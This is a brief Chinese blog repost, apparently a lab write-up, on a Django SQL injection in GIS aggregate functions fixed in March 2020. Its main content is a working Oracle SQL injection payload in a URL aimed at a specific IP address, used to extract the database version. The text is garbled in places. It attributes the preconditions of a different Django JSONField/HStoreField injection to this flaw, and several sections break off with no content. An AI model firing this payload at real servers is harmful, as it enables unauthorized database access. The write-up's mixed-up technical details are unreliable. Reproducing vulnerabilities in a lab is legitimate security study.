本文介绍: Django 于2020年3 月4日发布一个安全更新修复了 GIS 函数聚合中的 SQL 注入漏洞。该漏洞要求开发者使用 JSONField/HStoreField;此外,还可以控制 QuerySet字段名称。Django内置应用程序 Django-Admin 受到影响,这为我们提供了一种重现漏洞简单方法

漏洞描述

Django 于2020年3 月4日发布一个安全更新,修复了 GIS 函数聚合中的 SQL 注入漏洞

参考链接

漏洞要求开发者使用 JSONField/HStoreField;此外,还可以控制 QuerySet字段名称。Django 的内置应用程序 Django-Admin 受到影响,这为我们提供了一种重现漏洞简单方法

 漏洞环境及利用

搭建docker环境

这里遇到一个问题,这个占用空间比较大卡住了,后来查看docker日志发现

漏洞利用POC

http://139.196.87.102:8000/vuln/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1

漏洞利用如下

原文地址:https://blog.csdn.net/weixin_56537388/article/details/134595025

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。

如若转载,请注明出处:http://www.7code.cn/show_12537.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱suwngjj01@126.com进行投诉反馈,一经查实,立即删除

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注